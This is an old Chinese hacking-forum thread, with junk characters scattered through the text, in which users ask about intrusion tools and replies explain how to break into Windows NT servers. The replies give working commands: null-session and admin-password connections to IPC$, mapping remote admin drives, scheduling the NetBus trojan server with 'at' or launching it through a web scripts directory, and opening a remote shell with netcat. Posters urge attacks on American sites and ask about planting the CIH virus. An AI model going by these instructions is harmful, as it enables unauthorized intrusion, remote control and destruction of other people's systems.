《版主頁(yè)黑客工具和文章的幾個(gè)問題》中提到:/ T* c! |; ?. B; m$ x1 H# U
請(qǐng)教�����,從版主頁(yè)上載得PINGER�����,GRINDER�,LETMEIN等,卻不能用�����,PINGER安裝后���,明明安裝前文件有1M多����,但安裝完后生成的文件夾中只有PINGER。EXE����,40多K,運(yùn)行PINGER����,設(shè)置好IP,點(diǎn)PING��,彈出一個(gè)窗口(C++�����。����。��。)�,說(shuō)出錯(cuò)����,然后關(guān)閉了���,何故����,是不是安裝有誤����? 2。運(yùn)行LETMEIN�,彈出以下錯(cuò)誤:連接文件LETMEIN。EXE到不存在的NETAPI32���。DLL�����;NETGROUPGETUSERS���。 是否說(shuō)明需要NETAPI32。DLL文件,哪里有該DLL��。 3�����。USAKILLER 的教學(xué)文章中提到需在WINNT4����。0下運(yùn)行以下步驟等,是否要求我的操作系統(tǒng)也是WINNT4�����。0 �����,應(yīng)該不是吧����? 4����。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務(wù)器的操作系統(tǒng)為NT? 太多的問題需高手回答��,我花那么多的時(shí)間和金錢下載這幾M文件卻不能用����,實(shí)在窩囊哦, 強(qiáng)烈建議USAKILLER 等高手級(jí)的黑客寫更多的教學(xué)文章���,以提高我國(guó)黑客水平����。! q" L/ R: {! o W( P- `
> 我的機(jī)子MMX166�,WIN98,2�。5G,32M內(nèi)存�。
6 ], C$ s3 Q8 E5 Q* [
" X# C5 ~! w' {& U S黑客并不神秘,你只要了解操作系統(tǒng)��,學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn)�,輔助相關(guān)的工具,就可以成功���。; N" k. e5 U$ w: v" O2 a5 V
你的問題是��,pinger, grinder, letmein等工具必須要在NT上運(yùn)行�����,我們強(qiáng)烈建議�����,你一定要安裝NT���,對(duì)于你的機(jī)器配制����,和我們現(xiàn)在差不多�,只是比你多了32M內(nèi)存,2G硬盤�。( }0 \- c" P( I/ J, z/ p
其實(shí),攻擊敵站��,利用其操作系統(tǒng)本身的工具就可以了����,比如,我們?cè)贜T上攻擊某服務(wù)器�,該服務(wù)器為NT4.0,我們將做如下簡(jiǎn)單事情就有可能成功�����,假設(shè)目標(biāo)NT的IP地址為111.111.111.111����,做法如下:
$ F2 j0 d. l2 W7 o! _6 Gnet use \\111.111.111.111\ipc$ "" /user:""
4 D8 N/ Z" X# f' r" enet.exe是NT的工具文件,該命令將和目標(biāo)服務(wù)器建立Null Session��,如果成功����,你可以查看該服務(wù)器上的共享目錄:+ D9 K3 H8 d; m
net view \\111.111.111.111
+ ~/ b! t) o$ {當(dāng)然,如果你有該NT管理員密碼�����,就更好辦了����,假設(shè)其管理員Admin密碼為fuck:( j7 o/ w( b8 Q6 D
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"8 ]8 \( j$ @; g. ^# i* M: f
命令成功后,幾乎所有目標(biāo)NT上的配制�����,資源,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來(lái)查看或修改:7 f4 F: M+ J5 Y/ V b3 P, P
1�、查看或修改遠(yuǎn)程機(jī)器上的硬盤,假如目標(biāo)NT上有C���、D兩個(gè)硬盤:
5 x1 r4 H$ k" Hnet use x: \\111.111.111.111\c$0 @* Z& W1 S7 m8 X3 ]+ T
net use y: \\111.111.111.111\d$/ X c& A' w0 \. Y. c. ~
這樣�,目標(biāo)NT上的C����、D盤分別被影射為你本地的X、Y盤�����,你想怎么做都可以...9 {" }% ?# k6 D/ L# F
2����、管理目標(biāo)NT的用戶:
5 d3 j, q/ o5 f從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
- w# V6 w& C9 c鍵入\\111.111.111.111后,目標(biāo)NT上的所有用戶你想怎么做都可以�����,和管理你本地的一樣
# C/ L! E3 I( M( p1 ^9 O3��、管理目標(biāo)NT的服務(wù)
2 A [7 }( i/ s( V0 n3 _: \選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域”
* T9 X D% j/ d9 k% u這樣你可以管理目標(biāo)NT上的服務(wù)�,共享目錄
) h5 M+ z8 t; S4�����、IIS管理
& t# c K& E5 Z選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
9 |$ _5 T. Z6 p! y目標(biāo)NT的FTP、WWW服務(wù)你就可以重新配置, u a) W, r8 [7 ^6 I) a
5�����、事件管理2 _, B4 C/ e" Y5 Z. K+ S
“事件查看器”->連接到服務(wù)器->111.111.111.111 V7 O- O* |: J4 {0 A3 W+ I. d
2 [. m4 y/ E: `0 [
還有更多的東西�����,都可以用NT本身的功能來(lái)完成��,這些都是95, 98所不能實(shí)現(xiàn)的��。
; t' b% ]# l& c4 m- l4 v9 f W N. q/ U: A: ~1 d/ [. c
當(dāng)然��,98,95也能做一些事情��,但很麻煩�����,比如:
8 U) w; h* C) w9 c, d5 X! Ynet use \\111.111.111.111\ipc$ g- E% H& [4 o) @
net use z: \\111.111.111.111\d$ I5 ~2 }& \* Z( C+ M' E( Z
但其后不能帶參數(shù)����,即改用其他用戶或密碼�����,系統(tǒng)將用當(dāng)前用戶和密碼去登錄����,如果你知道目標(biāo)NT的用戶或密碼���,重新啟動(dòng)95, 98��,改用該用戶和密碼登錄����,方可實(shí)現(xiàn)�����,你可以連接目標(biāo)NT上的共享資源��,但不能進(jìn)行管理���,如用戶�、事件等/ z) ~5 Y8 c( B0 ~+ Q: G( c& r
0 j/ q* O( @- }1 H3 C) M, I; n我們強(qiáng)烈建議各位有心要為死難者報(bào)仇,真正的想黑霉國(guó)的站點(diǎn)��,花點(diǎn)時(shí)間�,裝個(gè)NT吧,NT Workstation也可以��!) u' L0 I6 C9 |( g4 v: @
這樣�����,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用�!
. s+ N1 a4 R+ r7 ~6 G- ~8 j# j0 J% p+ ~+ ~7 I( `# J8 B, L' l0 ^
2 l" X! `( G0 |! m" O1 O. H
--------------------------------------------------------------------------------+ m7 _9 R3 w9 `8 ?
8 d# o1 O1 `" @ j2 J
>quack于1999-06-12���,23:37:44
, \2 h( ?; h4 |, R2 m在大作《幾個(gè)有關(guān)黑的問題》中提到:
; C- M, F1 y+ Z首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時(shí)候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時(shí)亦無(wú)此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢到的IP地址若無(wú)機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無(wú)法登陸?再有,假定我上傳了CIH,對(duì)了,CIH對(duì)NT暫時(shí)無(wú)效,假定上傳其它"有益"美國(guó)NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國(guó)機(jī)子,但運(yùn)行程序時(shí)卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國(guó)鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說(shuō)一句,我還真干掉了幾個(gè)美國(guó)人,哈!����。0 Y3 a: ~& `0 n( K
# J, l! d, o5 C% j: [8 q x8 S
killusa于1999-06-13�����,03:25:15; G( u+ y1 r+ g2 r
在大作《Re: 幾個(gè)有關(guān)黑的問題》中提到:& |: R& J5 r: I/ @7 T( q: ]5 r& \
( z6 Y7 y: W- I7 h' m
letmein.exe 暫時(shí)沒有mypwd參數(shù)����,十分抱歉" f$ S" e! ], `5 ?! d: F
pinger程序��,只是利用ping來(lái)尋找主機(jī)�,每臺(tái)NT服務(wù)器有一個(gè)主IP地址����,但也可以設(shè)置多個(gè)輔助IP地址,比如有些服務(wù)器供應(yīng)商����,一臺(tái)NT服務(wù)器上可以設(shè)置一千多個(gè)IP,每個(gè)IP對(duì)應(yīng)一個(gè)Hostname,而真正能找到主機(jī)名的只有一個(gè)IP地址�����,就是該主機(jī)的主IP地址��,所以有時(shí)顯示只有IP�,而無(wú)主機(jī)名。另外��,有些服務(wù)器是非NT的操作系統(tǒng)����,有時(shí)將不會(huì)顯示主機(jī)名。當(dāng)然,有時(shí)在服務(wù)器上進(jìn)行一些設(shè)置��,也會(huì)出現(xiàn)上面的情況�����。, c6 I0 R& u( [8 c- P. M
$ i' E1 Q" Q$ }/ |. k
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個(gè)程序�,所以,netbus.exe是不用上傳的�����,只需在目的
1 a6 ]. W' B; `6 [0 _' j/ M1 Q服務(wù)器上運(yùn)行ntsrv.exe�����,而在目的服務(wù)器運(yùn)行該程序有很多種方法:
2 a0 {$ @) m, b1 B+ _% z0 S0 p
/ g8 c) Y! ]* n1 @, @" G1�����、利用服務(wù)器的 Schedule 服務(wù)來(lái)啟動(dòng)schedule 服務(wù)是指在服務(wù)器上定時(shí)運(yùn)行某程序����,具體使用方法���,可在自己的NT Dos窗口下鍵入以下:; L4 ?; A' c3 V# d6 a" r2 v. W
7 }, @% Q0 }$ t5 v. Z4 ?
C:\>net start schedule
6 c- U i! B* ~+ i, p' R* ^Schedule 正在啟動(dòng)服務(wù).....
2 q2 w4 q1 ]0 ~6 ?0 LSchedulw 服務(wù)啟動(dòng)成功�����。, ?2 P P. C9 {* ^' t
C:\>at /?, q7 M6 U+ M3 C; x6 Y
AT 命令排定在特定的日期和時(shí)間運(yùn)行某些命令和程序��。% B2 i y' f* E) l! f, H( t" f
運(yùn)行 AT 命令之前必須先啟動(dòng) Schedule 服務(wù)����。
* l6 x! V0 f# @( x. w5 j' \0 H" ^$ J" H0 z$ g9 e. K
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]1 u, f( L. ~% s0 f6 L: c6 {
AT [\\computername] time [/INTERACTIVE]
" ^' I# ]6 c2 F[ /EVERY:date[,...] | /NEXT:date[,...]] "command"# M. R+ F4 v, m& Q3 n5 g/ e3 b
/ h u" ^ _3 l: y8 l D7 Y$ u1 X\\computername 指定遠(yuǎn)程計(jì)算機(jī)。 如果省略這個(gè)參數(shù)
% h% K3 Q! I2 F. m w2 W3 c5 ~' b命令會(huì)被排定在本機(jī)上運(yùn)行�。
1 L/ [# |: e* \- l( b* z: mid 指定給排定進(jìn)度命令的識(shí)別號(hào)。; J* H# A$ |& r
. P: k* Y8 \7 L0 E: S3 }
/delete 刪除某個(gè)已排定進(jìn)度的命令��。如果省略標(biāo)識(shí)����,計(jì)算機(jī)上所有已排定進(jìn)度的命令都會(huì)被刪除。9 P8 R& p3 T2 o8 y
/yes 用于刪除所有作業(yè)�,且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息 。
7 q7 \, v5 ]. t5 _( L. G9 Ftime 指定命令運(yùn)行的時(shí)間�。/ B" n- P% `) u4 d! g2 a5 {
/interactive 允許作業(yè)在運(yùn)行時(shí),與用戶通過(guò)桌面交互���。8 Y9 i0 y- \+ p! H2 d3 {% t) n& L
* Z z& C% ?3 N/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令��。
3 [, A9 }0 [, Z$ Q( t8 ]! c$ q如果省略日期�,則默認(rèn)為在每月的本日運(yùn)行。
( _! S8 J8 E: w }) L
: `) Y; a r7 }3 S* A/next:date[,...] 指定在下一個(gè)指定日期 (如���,下周三)�,運(yùn)行命令�。如果省略日期,則默認(rèn)為在每月的本日運(yùn)行����。
& I- k/ V) t4 q# ^ Q$ {, {4 p; u
4 C, f1 j7 O' x4 |* ? ]"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件。2 o) J; J* V9 V: g s* D
/ X k, ^: K1 y# N: @' r) R, NC:\>
$ l" h9 N V# Z
* Q/ X b, [% g4 |2 C0 `! @8 h知道了如何使用AT���,再來(lái)看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:% l9 r3 \ G! ^% ~
1 利用管理員登陸到目的服務(wù)器���,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"4 _+ `; X3 d, O, a; @2 U: J
2 利用ntsrv.exe啟動(dòng)遠(yuǎn)程: netsvc \\x.x.x.x schedule /start
* a# P+ H* ]; `( L$ s$ @1 F3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行����,當(dāng)然最快運(yùn)行最理想,所以�,你可以用letmein.exe得到服務(wù)器的時(shí)間,然后:3 |& E* S7 c' t& T+ h' F$ P+ C
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
0 y a9 f; P5 S8 |其中00:00要改為用letmein.exe得回來(lái)的具體時(shí)間+一點(diǎn)容量�,等一會(huì)后����,再在本地啟動(dòng)netbus.exe���,鍵入目的服務(wù)器得ip地址或hostname���,連接!具體使用可參照 "How to get in nt"���,比如第一種方法�,你想要在目的服務(wù)器運(yùn)行 LEGION��,可以利用netbus得上傳功能����,將LEGION上傳至目的服務(wù)器,再用netbus的"Start program"��,鍵入完整路徑的LEGION運(yùn)行程序�����,就ok了�!第二種方法是利用netbus的“App redirect”功能����,啟動(dòng)遠(yuǎn)程telnet服務(wù)���,如下:在netbus中擊“App redirect”�����,鍵入"C:\>winnt\system32\cmd.exe"�����,Port為:4321��,服務(wù)就啟動(dòng)了��,然后在本地運(yùn)行:nc x.x.x.x 4321���,出現(xiàn)dos啟動(dòng)的畫面就表示連接成功:
8 o* N: e5 ?( A& n& {8 k& eMicrosoft(R) Windows NT(TM)
+ ~( F1 M2 i; L) f+ _(C) Copyright 1985-1996 Microsoft Corp.
# @& [: `4 W: ^ l3 F3 fC:\> r+ _1 ?& @9 Z1 k h
. [4 J; v0 |" M
2、利用web啟動(dòng)ntsrv.exe或其他程序在目的服務(wù)器+ z* ]) Z& y% b. M0 H
3 [/ x/ c2 C, Z _. p將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄��,如cgi-bin或scripts�,然后在瀏覽器鍵入url如:
+ y( ]6 N4 h/ Y" chttp://x.x.x.x/scripts/ntsrv.exe /port:643214 q3 ^. o# v' V
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
1 p$ L% F$ @3 U; m4 K該程序就啟動(dòng)了! D3 c9 h( |. n4 c, d( P
]# N- V |5 n* ?" ^, W我只提這幾中方法����!
7 D: r8 b" l6 q* F* |0 m要成功�����,必須打好基礎(chǔ)工�����,對(duì)操作系統(tǒng)充分了解!
2 b9 b! W6 b6 e( ]
) `6 t; e2 W# T6 ^5 t5 _& O) n |
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡